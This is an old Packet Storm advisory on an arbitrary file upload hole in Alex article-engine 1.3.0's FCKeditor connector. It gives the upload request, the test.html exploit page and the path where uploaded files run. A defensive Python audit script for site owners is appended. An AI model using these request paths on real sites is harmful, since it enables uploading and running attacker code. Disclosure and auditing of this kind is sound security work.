alexarticle-upload.txt

2008-11-19T00:00:00
ID PACKETSTORM:72089
Type packetstorm
Reporter Batter
Modified 2008-11-19T00:00:00

Description

`########################################################################  
#  
# Yellow Flood Organization  
#  
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload  
#  
# Source: http://www.alexscriptengine.de/blog/category/article-engine/  
#  
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/  
#  
# Discovered by: Batter  
#  
########################################################################  
  
  
  
####################  
- Vulnerability:  
####################  
  
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?  
  
Command=FileUpload&Type=File&CurrentFolder=/  
  
####################  
- Exploit:  
####################  
  
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html  
  
####################  
- How to use:  
####################  
  
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*  
  
####################  
- Solution:  
####################  
  
Restrict access to these resources so that only trusted users can reach them.  
  
####################  
- Greets :  
####################  
  
THE.HACKER.ONE , Str0ke  
  
####################  
  
`
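
Added example, not part of the original advisory: a Python audit a site owner can run over a local copy of the web root to find the connector and upload test page named above, check whether the PHP connector is disabled, and flag script files in the upload folder. The config.php location, the $Config['Enabled'] switch and the extension list are assumptions based on stock FCKeditor 2.x, not details from the advisory.

```python
import os
import re
import sys

# Directory and file names come from the advisory. config.php and its
# $Config['Enabled'] switch are assumed from stock FCKeditor 2.x.
CONNECTORS = os.path.join("editor", "filemanager", "browser", "default", "connectors")
UPLOAD_DIR = os.path.join("images", "site_images")
ENABLED = re.compile(r"^\s*\$Config\[\s*['\"]Enabled['\"]\s*\]\s*=\s*(\w+)", re.M)
# Assumed set of extensions the web server hands to an interpreter.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "pl", "cgi"}


def audit_webroot(webroot):
    """Walk a local copy of the site; return sorted (finding, relative path) pairs."""
    findings = []

    def add(kind, dirpath, name):
        path = os.path.relpath(os.path.join(dirpath, name), webroot)
        findings.append((kind, path.replace(os.sep, "/")))

    for dirpath, _dirs, files in os.walk(webroot):
        if dirpath.endswith(CONNECTORS):
            # Connector test pages such as test.html are upload forms; do not deploy them.
            for name in files:
                if name.lower().endswith((".html", ".htm")):
                    add("connector-test-page", dirpath, name)
        elif dirpath.endswith(os.path.join(CONNECTORS, "php")) and "connector.php" in files:
            state = "missing-config"
            if "config.php" in files:
                with open(os.path.join(dirpath, "config.php"), errors="replace") as fh:
                    match = ENABLED.search(fh.read())
                state = match.group(1).lower() if match else "no-enabled-switch"
            if state != "false":
                add("connector-not-disabled:" + state, dirpath, "connector.php")
        elif dirpath.endswith(UPLOAD_DIR):
            # Flag script extensions anywhere in the name, so name.php.jpg is caught too.
            for name in files:
                if SCRIPT_EXT & set(name.lower().split(".")[1:]):
                    add("script-in-upload-dir", dirpath, name)
    return sorted(findings)


if __name__ == "__main__":
    for kind, path in audit_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(kind, path)
```

Any finding on a production host means the connector directory should be removed or placed behind authentication, and files flagged in the upload folder should be reviewed.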